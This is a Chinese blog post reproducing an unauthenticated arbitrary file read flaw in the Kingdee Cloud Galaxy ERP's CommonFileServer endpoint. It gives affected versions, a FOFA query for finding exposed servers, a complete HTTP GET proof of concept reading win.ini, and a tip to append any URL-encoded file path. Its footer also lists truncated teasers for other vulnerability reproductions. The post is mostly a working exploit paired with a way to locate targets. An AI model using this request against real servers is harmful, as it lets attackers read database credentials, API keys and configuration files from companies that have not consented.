首页 > 其他分享 >漏洞复现-金蝶云星空任意文件读取

漏洞复现-金蝶云星空任意文件读取

时间:2023-08-16 17:34:02浏览次数:33  
标签:星空 金蝶 漏洞 复现 企业 CommonFileServer 读取

0x01 产品简介
  金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。

0x02 漏洞概述
  由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

0x03 影响范围
  6.x版本、7.x版本、8.x版本(均受影响)

0x04 复现环境
FOFA:app="金蝶云星空-管理中心"

 0x05 漏洞复现

POC:

1 2 3 4 5 6 GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive

PS:漏洞比较简单粗暴,直接在/CommonFileServer/路径后面拼接文件名就行(特殊符号url编码)

 

 

标签:星空,金蝶,漏洞,复现,企业,CommonFileServer,读取
From: https://www.cnblogs.com/1zzZ/p/17635724.html

相关文章

  • 漏洞复现-绿盟 NF下一代防火墙 任意文件上传漏洞
    漏洞描述:绿盟SSLVPN存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行漏洞影响:绿盟SSLVPN网络测绘:app="NSFOCUS-下一代防火墙" 出现漏洞的端口为808112345678910POST/api/v1/device/bugsInfoHTTP......
  • 漏洞复现-金蝶云星空任意文件读取
    0x01产品简介金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。服务涵盖:财务、供......
  • 漏洞复现-深信服DC数据中心管理系统 XML注入漏洞
    0x01产品简介深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。0x02漏洞概述深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进......
  • 常用文件读取(python)
    CSV文件CSV(Comma-SeparatedValues)是一种常见的文本文件格式,用于存储结构化的数据。CSV文件中的数据是以逗号(或其他指定的分隔符)分隔的文本行,每一行表示一条记录,每个字段表示记录中的一个属性或值。读CSVimportcsvimportcodecsfile_name=""withopen(file_name,"r",en......
  • pageinfo-只能读取当前条数不能获取总条数
    pageInfo的total属性是当前页记录数,如何配置使total设置成总记录数原 PageHelper.startPage(page,pageSize);LambdaQueryWrapper<Credit>queryWrapper=newQueryWrapper<Credit>().lambda().eq(Credit::getUserId,dto.getUid());......
  • Python 如何自动遍历文件下所有的文件,然后再对每一个文件夹读取里面的csv文件
    Python如何自动遍历文件下所有的文件,然后再对每一个文件夹读取里面的csv文件:代码:importosimportcsv#设置要遍历的文件夹路径folder_path="your_folder_path"#遍历文件夹forroot,dirs,filesinos.walk(folder_path):#遍历当前文件夹下的所有文件for......
  • 金蝶云星空第三方系统登录授权二次密钥重置
    参考:第三方系统登录授权二次密钥怎么重置(kingdee.com)云星空版本:8.1私有云,即测试环境第三方系统登录授权获取秘钥的时候需要二次验权密码,但是我没有或者其他人设置了但是忘记了。 此时只能重置密码了。解决方案:具体操作步骤:1、去管理中心打开数据中心找到当前业务账套......
  • 在Angular项目中如何读取json文件呢?
    直接进入主题,我们的最终目得是要读取文件,那么首先我们需要先创建文件,第一步:创建我们今天所需要在assets创建需要读取的文件Message.json,如下:[{"id":"E0001","msg":"{0}の取得に失敗しました。"},{"id":"E0002",&quo......
  • 漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞
    1.简介jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。据一项调查报告,在对4......
  • DASCTF复现 TODO
    参考链接原型链污染相关https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.htmlhttps://tttang.com/archive/1876/proc环境变量https://www.anquanke.com/post/id/241148#h2-1python内置属性https://www.cnblogs.com/zhjblogs/p/14725666.htm......